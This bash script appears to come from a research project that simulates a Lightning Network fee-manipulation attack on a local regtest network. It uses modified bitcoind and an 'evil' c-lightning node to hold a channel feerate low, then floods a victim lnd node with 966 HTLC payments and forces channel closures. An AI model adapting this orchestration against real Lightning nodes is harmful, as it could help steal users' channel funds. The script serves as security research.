#!/usr/bin/env bash
#------------------------------------------------------------
#    This code was auto-generated by: CommandsGenerator
#    Version: A.113
#------------------------------------------------------------
#
# well... partially


# this simulation shows how an attacker can decrease a channel's feerate when
# fees go down, keep it low when fees go up and the victim acts normally and lets
# us route payments through him

# IMPORTANT: this script is based on a modified bitcoind whose feerate
# estimations are read from /tmp/feerate.txt
# don't try to run it with standard bitcoind


# feerates in sat/kb
LOW_FEERATE=3000 # 3 sat/byte
MED_FEERATE=100000 # 100 sat/byte
HIGH_FEERATE=2000000 # 2000 sat/byte

set_feerate(){
    # bitcoind was modified to read feerate from this file, instead of actually estimating
    echo $1 > /tmp/feerate.txt
    # wait a bit after we change fees, so the lightning nodes have time to
    # exchange messages. c-lightning does that in multiple small steps
    sleep 150
}

set_low(){
    echo "setting low blockchain feerate"
    set_feerate $LOW_FEERATE 
}

set_med(){
    echo "setting medium blockchain feerate"
    set_feerate $MED_FEERATE 
}

set_high(){
    echo "setting high blockchain feerate"
    set_feerate $HIGH_FEERATE 
}

estimate(){
    echo "Estimating feerate for 1 conf:"
    for i in 0 11 31 41; do
        printf "bcli 0: "
        /home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000 estimatesmartfee 1
        printf "bcli 11: "
        /home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14011 estimatesmartfee 1
        printf "bcli 31: "
        /home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14031 estimatesmartfee 1
        printf "bcli 41: "
        /home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14041 estimatesmartfee 1
    done
}

print_channel_feerates(){
    echo "node 41 channel feerates:"
    /home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons listchannels | jq ".channels[] | .fee_per_kw"
}


echo "starting all bitcoin nodes"
mkdir -p /tmp/lightning-simulations/1/bitcoin-datadirs/0
bitcoind  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -port=13000  -rpcport=14000  -datadir=/tmp/lightning-simulations/1/bitcoin-datadirs/0  -daemon  -blockmaxweight=4000000  -zmqpubrawblock=tcp://127.0.0.1:15000  -zmqpubrawtx=tcp://127.0.0.1:16000
mkdir -p /tmp/lightning-simulations/1/bitcoin-datadirs/11
bitcoind  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -port=13011  -rpcport=14011  -datadir=/tmp/lightning-simulations/1/bitcoin-datadirs/11  -daemon  -blockmaxweight=4000000  -zmqpubrawblock=tcp://127.0.0.1:15011  -zmqpubrawtx=tcp://127.0.0.1:16011
mkdir -p /tmp/lightning-simulations/1/bitcoin-datadirs/31
bitcoind  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -port=13031  -rpcport=14031  -datadir=/tmp/lightning-simulations/1/bitcoin-datadirs/31  -daemon  -blockmaxweight=4000000  -zmqpubrawblock=tcp://127.0.0.1:15031  -zmqpubrawtx=tcp://127.0.0.1:16031
mkdir -p /tmp/lightning-simulations/1/bitcoin-datadirs/41
bitcoind  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -port=13041  -rpcport=14041  -datadir=/tmp/lightning-simulations/1/bitcoin-datadirs/41  -daemon  -blockmaxweight=4000000  -zmqpubrawblock=tcp://127.0.0.1:15041  -zmqpubrawtx=tcp://127.0.0.1:16041
echo "waiting until bitcoin node 0 is ready"

        while [[ $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  echo "sanity" 2>/dev/null | jq -r ".[0]") != "sanity" ]]; do
            sleep 1;
        done
        
echo "waiting until bitcoin node 11 is ready"

        while [[ $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14011  echo "sanity" 2>/dev/null | jq -r ".[0]") != "sanity" ]]; do
            sleep 1;
        done
        
echo "waiting until bitcoin node 31 is ready"

        while [[ $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14031  echo "sanity" 2>/dev/null | jq -r ".[0]") != "sanity" ]]; do
            sleep 1;
        done
        
echo "waiting until bitcoin node 41 is ready"

        while [[ $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14041  echo "sanity" 2>/dev/null | jq -r ".[0]") != "sanity" ]]; do
            sleep 1;
        done
        
echo "connecting all bitcoin nodes to the miner node"
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  addnode 127.0.0.1:13011 add
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14011  addnode 127.0.0.1:13000 add
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  addnode 127.0.0.1:13031 add
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14031  addnode 127.0.0.1:13000 add
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  addnode 127.0.0.1:13041 add
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14041  addnode 127.0.0.1:13000 add
echo "connecting all bitcoin nodes in circle"
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14011  addnode 127.0.0.1:13031 add
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14031  addnode 127.0.0.1:13041 add
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14041  addnode 127.0.0.1:13011 add
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  generatetoaddress  500 $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  getnewaddress) >/dev/null
echo "waiting until all bitcoin nodes have reached height 500"

        while [[ $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14011  -getinfo | jq ".blocks") -lt "500" ]]; do
            sleep 1
        done
        

        while [[ $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14031  -getinfo | jq ".blocks") -lt "500" ]]; do
            sleep 1
        done
        

        while [[ $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14041  -getinfo | jq ".blocks") -lt "500" ]]; do
            sleep 1
        done
        
echo "starting all lightning nodes"
mkdir -p /tmp/lightning-simulations/1/lightning-datadirs/11
/home/jona/lightning-systemic-attack/bin/lightningd-evil   --conf=/home/jona/lightning-systemic-attack/conf/clightning.conf  --lightning-dir=/tmp/lightning-simulations/1/lightning-datadirs/11  --addr=127.0.0.1:10011  --log-file=log  --alias=11  --evil    --log-level=DEBUG  --bitcoin-rpcconnect=127.0.0.1  --bitcoin-rpcport=14011  --daemon
echo "lightning node 11 started"
mkdir -p /tmp/lightning-simulations/1/lightning-datadirs/31
/home/jona/lightning-systemic-attack/bin/lightningd-evil   --conf=/home/jona/lightning-systemic-attack/conf/clightning.conf  --lightning-dir=/tmp/lightning-simulations/1/lightning-datadirs/31  --addr=127.0.0.1:10031  --log-file=log  --alias=31  --evil    --log-level=DEBUG  --bitcoin-rpcconnect=127.0.0.1  --bitcoin-rpcport=14031  --daemon
echo "lightning node 31 started"
mkdir -p /tmp/lightning-simulations/1/lightning-datadirs/41

        wait_interval=2 # how long we wait between commands
        lncli_timeout=5 # how long we let lncli run
        while true; do
            /home/jona/lightning-systemic-attack/bin/lnd  --configfile=/home/jona/lightning-systemic-attack/conf/lnd.conf  --datadir=/tmp/lightning-simulations/1/lightning-datadirs/41  --logdir=/tmp/lightning-simulations/1/lightning-datadirs/41  --tlscertpath=/tmp/lightning-simulations/1/lightning-datadirs/41/tls.cert  --tlskeypath=/tmp/lightning-simulations/1/lightning-datadirs/41/tls.key  --no-macaroons  --restlisten=12041  --rpclisten=127.0.0.1:11041  --listen=127.0.0.1:10041  --bitcoind.rpchost=127.0.0.1:14041  --bitcoind.dir=/tmp/lightning-simulations/1/bitcoin-datadirs/41  --bitcoind.zmqpubrawblock=127.0.0.1:15041  --bitcoind.zmqpubrawtx=127.0.0.1:16041  --debuglevel=debug  --alias=41  >/tmp/lightning-simulations/1/lightning-datadirs/41/lnd.log 2>&1 &
            lnd_pid=$!
            sleep $wait_interval
            timeout -s SIGKILL ${lncli_timeout}s script -a /dev/null -q -c "/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons create"  <<< "00000000
00000000
n

" >/dev/null
            sleep $wait_interval
            timeout -s SIGKILL ${lncli_timeout}s  script -a /dev/null -q -c "/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons unlock" <<< "00000000
" >/dev/null
            sleep $wait_interval
            if [[ $(/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons getinfo 2>/dev/null | jq -r ".alias") == 41 ]]; then
                break
            fi
            kill -s SIGKILL $lnd_pid
            sleep $wait_interval
            # wait a bit longer next time, in case that wasn't enough
            wait_interval=$((wait_interval+2))
            lncli_timeout=$((lncli_timeout+2))
        done
        
echo "lightning node 41 started"
echo "funding lightning nodes"
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  generatetoaddress  103 $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  getnewaddress) >/dev/null
ADDR_11=$(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  newaddr | jq -r '.address')
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  sendtoaddress $ADDR_11 1
ADDR_31=$(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  newaddr | jq -r '.address')
ADDR_41=$(/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons newaddress p2wkh | jq -r '.address')
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  sendtoaddress $ADDR_41 1
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  generatetoaddress  10 $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  getnewaddress) >/dev/null
echo "waiting until lightning nodes are synchronized and have received their funds"

    while [[ $(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  listfunds | jq -r ".outputs") == "[]" ]]; do
        sleep 1
    done
    

    while [[ $(/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons walletbalance | jq -r ".confirmed_balance") == 0 ]]; do
        sleep 1
    done


# initial medium fee before opening channels
set_med


echo "establishing channel from 11 to 41"
ID_41=$(/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons getinfo | jq -r '.identity_pubkey')
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  connect $ID_41 127.0.0.1:10041
ID_41=$(/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons getinfo | jq -r '.identity_pubkey')
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  fundchannel $ID_41 10000000
echo "establishing channel from 41 to 31"
ID_31=$(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  getinfo | jq -r '.id')
/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons connect ${ID_31}@127.0.0.1:10031
ID_31=$(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  getinfo | jq -r '.id')
/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons openchannel --node_key=${ID_31} --local_amt=10000000
echo "waiting for funding transactions to enter miner's mempool"

        while [[ $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  getmempoolinfo | jq -r ".size") -lt "2" ]]; do
            sleep 1;
        done
        
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  generatetoaddress  10 $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  getnewaddress) >/dev/null


print_channel_feerates

set_low
# the evil node should now lower the channel's feerate

print_channel_feerates

set_high
# the evil node doesn't change the channel's feerate if it increases. it should 
# remain low even though the blockchain fees increased

print_channel_feerates

# we now start the attack with low channel's feerate, but high blockchain feerate
# we want to see whether the victim is still willing to forward our HTLCs


echo "connecting 11 to 31"
ID_31=$(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  getinfo | jq -r '.id')
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  connect $ID_31 127.0.0.1:10031
echo "waiting for a known route from 11 to 31"
RISKFACTOR=1
RECEIVER_ID=$(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  getinfo | jq -r '.id')

    while [[ "$(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  getroute $RECEIVER_ID 11000000 $RISKFACTOR | jq -r ".route")" == "null" ]]; do
        sleep 1;
    done
        
echo "making 966 payments from 11 to 31"

        show-progress-bar(){
            PERCENT=$1
            TERMINAL_WIDTH=$(tput cols)
            TOTAL_SLOTS=$((TERMINAL_WIDTH - 10))
            NUM_FULL_SLOTS=$(((TOTAL_SLOTS * PERCENT) / 100))
            NUM_EMPTY_SLOTS=$((TOTAL_SLOTS - NUM_FULL_SLOTS))
            printf "\r["
            printf "%0.s=" $(seq 1 $NUM_FULL_SLOTS)
            printf "%0.s " $(seq 1 $NUM_EMPTY_SLOTS)
            printf "] ${PERCENT}%% "
        }
        
NUM_PAYMENTS=966
RISKFACTOR=1
RECEIVER_ID=$(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  getinfo | jq -r '.id')
for i in $(seq 1 $NUM_PAYMENTS); do

        ROUTE=$(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  getroute $RECEIVER_ID 11000000 $RISKFACTOR | jq -r ".route")
        if [[ $ROUTE != null ]]; then
        
LABEL="invoice-label-$(date +%s.%N)" 
PAYMENT_REQ=$(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  invoice 11000000 $LABEL "" | jq -r ".bolt11")

            PAYMENT_HASH=$(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  decodepay $PAYMENT_REQ | jq -r ".payment_hash")
            /home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  sendpay "$ROUTE" "$PAYMENT_HASH" > /dev/null
        fi        
        show-progress-bar $(((i*100)/NUM_PAYMENTS))
        
done
echo
echo "number of HTLCs node 31 has on each channel:"
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  listpeers| jq ".peers[] | .channels[] | .htlcs" | jq length
echo "stopping 11"
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  stop
echo "Revealing preimages by node 31"
PEER_ID=

    while [[ $(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  revealpreimages $PEER_ID | jq -r ".htlcs_processed") != 0 ]]; do
        sleep 1
    done
    
echo "closing all channels of node 31"
PEER_IDS=$(/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  listpeers | jq -r ".peers[] | .id")

    for id in $PEER_IDS; do
        /home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  close $id 60
    done

echo "number of HTLCs node 41 has on each channel:"
/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons listchannels | jq ".channels[] | .pending_htlcs" | jq length
echo "starting lightning node 11 in silent mode"
mkdir -p /tmp/lightning-simulations/1/lightning-datadirs/11
/home/jona/lightning-systemic-attack/bin/lightningd-evil   --conf=/home/jona/lightning-systemic-attack/conf/clightning.conf  --lightning-dir=/tmp/lightning-simulations/1/lightning-datadirs/11  --addr=127.0.0.1:10011  --log-file=log  --alias=11  --evil  --silent  --log-level=DEBUG  --bitcoin-rpcconnect=127.0.0.1  --bitcoin-rpcport=14011  --daemon
echo "dumping channels information of all lightning nodes"
mkdir -p '/home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations'
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  listchannels >> /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/node_11_channels
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  listpeers >> /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/node_11_channels
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  listchannels >> /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/node_31_channels
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  listpeers >> /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/node_31_channels
/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons listpeers >> /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/node_41_channels
/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons listchannels >> /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/node_41_channels
echo "mining: advancing blockchain by 150 blocks with block_time=300sec"
mkdir -p '/home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations'
BLOCKCHAIN_HEIGHT=$(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  -getinfo | jq ".blocks")
DEST_HEIGHT=$((BLOCKCHAIN_HEIGHT + 150))
while [[ $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  -getinfo | jq ".blocks") -lt $DEST_HEIGHT ]]; do
sleep 300
txids=$(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  getrawmempool | jq -r ".[]") 

        for txid in $txids; do
            TX=$(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  getrawtransaction $txid true)
            if [[ ! -z "$TX" ]]; then
                echo $TX > /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/tx_${txid}.json
            fi
        done
        
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  generatetoaddress  1 $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  getnewaddress) >/dev/null
done
echo "mining: advancing blockchain by 100 blocks with block_time=5sec"
BLOCKCHAIN_HEIGHT=$(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  -getinfo | jq ".blocks")
DEST_HEIGHT=$((BLOCKCHAIN_HEIGHT + 100))
while [[ $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  -getinfo | jq ".blocks") -lt $DEST_HEIGHT ]]; do
sleep 5
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  generatetoaddress  1 $(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  getnewaddress) >/dev/null
done
echo "dumping simulation data"
mkdir -p '/home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations'
BLOCKCHAIN_HEIGHT=$(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  -getinfo | jq ".blocks")

        for i in $(seq 1 $BLOCKCHAIN_HEIGHT); do
            BLOCK_HASH=$(/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  getblockhash $i)
            /home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  getblock $BLOCK_HASH > /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/block_$i.json
            TXS_IN_BLOCK=$(jq -r ".tx[]" < /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/block_$i.json)
            for TX in $TXS_IN_BLOCK; do
                /home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  getrawtransaction $TX true > /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/tx_$TX.json
            done
        done
        
printf "node 11 balance: " >> /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/nodes_balance
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  listfunds | jq '.outputs[] | .value' | jq -s add >> /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/nodes_balance
printf "node 31 balance: " >> /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/nodes_balance
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  listfunds | jq '.outputs[] | .value' | jq -s add >> /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/nodes_balance
printf "node 41 balance: " >> /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/nodes_balance
/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons walletbalance | jq -r ".total_balance" >> /home/jona/lightning-systemic-attack/simulations/test-fees-fluctuations/nodes_balance
echo "stopping all lightning nodes"
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/11"  stop
/home/jona/lightning-systemic-attack/bin/lightning-cli --conf="/home/jona/lightning-systemic-attack/conf/clightning.conf" --lightning-dir="/tmp/lightning-simulations/1/lightning-datadirs/31"  stop
/home/jona/lightning-systemic-attack/bin/lncli  --rpcserver 127.0.0.1:11041  --lnddir /tmp/lightning-simulations/1/lightning-datadirs/41  --no-macaroons stop
echo "stopping all bitcoin nodes"
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14000  stop
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14011  stop
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14031  stop
/home/jona/lightning-systemic-attack/bin/bitcoin-cli  -conf=/home/jona/lightning-systemic-attack/conf/bitcoin.conf  -rpcport=14041  stop
echo "Done"
